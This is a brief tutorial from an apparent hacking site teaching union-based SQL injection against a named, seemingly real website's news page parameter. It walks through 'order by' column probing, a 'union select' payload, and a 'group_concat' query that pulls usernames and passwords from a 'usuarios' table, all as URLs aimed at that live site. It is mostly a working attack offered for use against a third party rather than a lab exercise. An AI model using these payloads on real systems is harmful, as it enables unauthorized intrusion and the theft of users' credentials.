welcome to www.n0bz.com today i gonna tech you how to inject website using sqli injection using this sqli injection code we can see all table databases columns etc so lets start
Requirement
Hack bar
Vulnerability Website i have this one http://www.cgcym.org.ar/noticia.php?id=18i hope you understand simple sqli injection how to check this its vuln or not and hope you know that how to find order and table numbers if you dont know please visit and watch previous tutorials :)
1. so now we need to find order i have already find it it has 9 order like
http://www.cgcym.org.ar/noticia.php?id=18 order by 9 (no erro)
http://www.cgcym.org.ar/noticia.php?id=18 order by 10 (error)
so next use union select command and find table number
2. http://www.cgcym.org.ar/noticia.php?id=-18+union+select+1,2,3,4,5,6,7,8,9--+-
3. copy this code replace 3 number and past it then click execute button
4. we need to find data , remove this code in 3 columns and write 'group_concat(us,0x3a,pw)' and in the url end write table name like usuarios and click execute button
first one is user and second one is password i hope you like this Thanks fro Visiting
Watch Video
Sign up here with your email